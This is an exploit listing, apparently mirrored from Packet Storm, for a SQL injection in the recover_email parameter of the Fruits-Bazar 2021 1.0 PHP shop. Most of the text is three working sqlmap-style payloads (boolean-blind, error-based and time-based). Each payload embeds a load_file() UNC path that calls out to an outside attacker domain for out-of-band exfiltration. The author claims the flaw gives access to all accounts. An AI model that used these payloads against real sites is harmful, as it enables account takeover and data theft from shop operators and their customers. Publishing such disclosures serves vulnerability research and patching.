Exploit for Fruits-Bazar 2021 1.0 SQL Injection

Name: Exploit for Fruits-Bazar 2021 1.0 SQL Injection
Rating: 5 (205 reviews)
2022-06-29 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:167617
## Title: Fruits-Bazar 2021 v1.0 SQLi  
## Author: nu11secur1ty  
## Date: 06.29.2022  
## Vendor: https://github.com/creativesaiful  
## Software: https://github.com/creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar  
  
## Description:  
The recover_email parameter appears to be vulnerable to SQL injection attacks.  
The attacker can take access to all accounts on this system.  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
---  
Parameter: recover_email (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select  
load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+''  
OR NOT 9177=9177 AND 'HeFM'='HeFM&u_pass_recover=Recover Password  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select  
load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+''  
AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT  
(ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND  
'Mvga'='Mvga&u_pass_recover=Recover Password  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select  
load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+''  
AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND  
'qfSm'='qfSm&u_pass_recover=Recover Password  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar)  
  
## Proof and Exploit:  
[href](https://streamable.com/ngodwj)  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>